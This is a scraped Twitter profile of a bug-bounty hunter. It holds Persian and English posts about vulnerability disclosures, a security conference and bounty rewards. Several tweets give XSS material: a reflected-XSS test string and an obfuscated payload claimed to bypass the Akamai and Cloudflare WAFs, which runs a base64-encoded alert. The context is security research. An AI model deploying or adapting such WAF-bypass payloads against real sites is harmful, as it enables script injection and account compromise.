Radman (@iarvy0x) 's Twitter Profile
Radman

@iarvy0x

Bug Hunter

ID: 1623866965562650624

calendar_today10-02-2023 02:10:46

85 Tweet

596 Followers

561 Following

 یاشو (@voorivex) 's Twitter Profile Photo

اینم باج‌گیری سبک جدید، یعنی آلردی دیتات هست پول بدی پاک می‌کنم (شایدم نکنه) حالا اکلیل برینین برای این باتا بگین هکشون جرمه و کارشون قانونیه، جایی بار بخوره بم از این باتا قطعا wipe میکنم، چون با یه سری اصولم در تناقضه و هزینشم میدم مهم نیست، مثل دیروز تا الان که دادم

اینم باج‌گیری سبک جدید، یعنی آلردی دیتات هست پول بدی پاک می‌کنم (شایدم نکنه) حالا اکلیل برینین برای این باتا بگین هکشون جرمه و کارشون قانونیه، جایی بار بخوره بم از این باتا قطعا wipe میکنم، چون با یه سری اصولم در تناقضه و هزینشم میدم مهم نیست، مثل دیروز تا الان که دادم
Sam Curry (@samwcyo) 's Twitter Profile Photo

New writeup from ꙅɿɘƚɔɘqꙅ and I: we're finally allowed to disclose a vulnerability reported to Kia which would've allowed an attacker to remotely control almost all vehicles made after 2013 using only the license plate. Full disclosure: samcurry.net/hacking-kia

 یاشو (@voorivex) 's Twitter Profile Photo

سلام با کلی بالا و پایین و پارگی تصمیم گرفتیم یه کنفرانس امنیتی/هانتری برگزار کنیم، امیدواریم که حرکت مثبتی باشه. تاریخ ۲۴ و ۲۵ آبان برگزار میشه، برای ارسال مقالات تا ۴ آبان وقت هست. یه سری موارد هم نمی‌گیم که سورپرایزطور باشه. کلیه جزئیات توی سایت: vooricon.com

سلام با کلی بالا و پایین و پارگی تصمیم گرفتیم یه کنفرانس امنیتی/هانتری برگزار کنیم، امیدواریم که حرکت مثبتی باشه. تاریخ ۲۴ و ۲۵ آبان برگزار میشه، برای ارسال مقالات تا ۴ آبان وقت هست. یه سری موارد هم نمی‌گیم که سورپرایزطور باشه. کلیه جزئیات توی سایت:

vooricon.com
Sam Curry (@samwcyo) 's Twitter Profile Photo

New blog post with shubs: We found a vulnerability in Subaru where an attacker, with just a license plate, could retrieve the full location history, unlock, and start vehicles remotely. The issue was reported and patched. Full post here: samcurry.net/hacking-subaru

Radman (@iarvy0x) 's Twitter Profile Photo

در جلسه‌ای که با اعضای وزارت داشتم، آسیب‌پذیری به‌همراه اکسپلویت آن گزارش شد. قرار است این آسیب‌پذیری به‌زودی برطرف شود. به امید اینترنتی امن‌تر.

Radman (@iarvy0x) 's Twitter Profile Photo

حساب هکروان ما هم بن شد:( چرا: چون که یه چند باری VPN قطع شده و آیپی ایران افتاده. اگر نه تمام اطلاعات برای فرم مالیاتی و ویفای درست بوده. فقط به خاطر این آیپی کیری جمهوری اسلامی.😐😐

Radman (@iarvy0x) 's Twitter Profile Photo

سال جدید رو به همه تبریک میگم امیدوارم سال خیلی خوبی برای همه باشه. برای بچه های باگ هانتر هم سال پر از باگی باشه.

Radman (@iarvy0x) 's Twitter Profile Photo

rXSS via url parameter 1. I discovered reflection in a URL parameter 2. All inputs I submitted were being HTML encoded 3. I submitted the following input: https://sss'"<>, and in the response, my payload was displayed without proper sanitization. #xss #BugBounty #infosec

rXSS via url parameter
1. I discovered reflection in a URL parameter
2. All inputs I submitted were being HTML encoded
3. I submitted the following input: https://sss'"&lt;&gt;, and in the response, my payload was displayed without proper sanitization.
#xss #BugBounty #infosec
Radman (@iarvy0x) 's Twitter Profile Photo

I just found a WAF bypass for Akamai and Cloudflare: <address onscrollsnapchange=window['ev'+'a'+(['l','b','c'][0])](window['a'+'to'+(['b','c','d'][0])]('YWxlcnQob3JpZ2luKQ==')); style=overflow-y:hidden;scroll-snap-type:x><div style=scroll-snap-align:center>1337</div></address>

I just found a WAF bypass for Akamai and Cloudflare:
&lt;address onscrollsnapchange=window['ev'+'a'+(['l','b','c'][0])](window['a'+'to'+(['b','c','d'][0])]('YWxlcnQob3JpZ2luKQ==')); style=overflow-y:hidden;scroll-snap-type:x&gt;&lt;div style=scroll-snap-align:center&gt;1337&lt;/div&gt;&lt;/address&gt;
Radman (@iarvy0x) 's Twitter Profile Photo

Yay, i was rewarded $1500 Bug: Stored XSS via an SVG file led to full account data exposure Tip: Always try to exploit XSS and don’t just report it with a simple alert

Yay, i was rewarded $1500
Bug: Stored XSS via an SVG file led to full account data exposure
Tip: Always try to exploit XSS and don’t just report it with a simple alert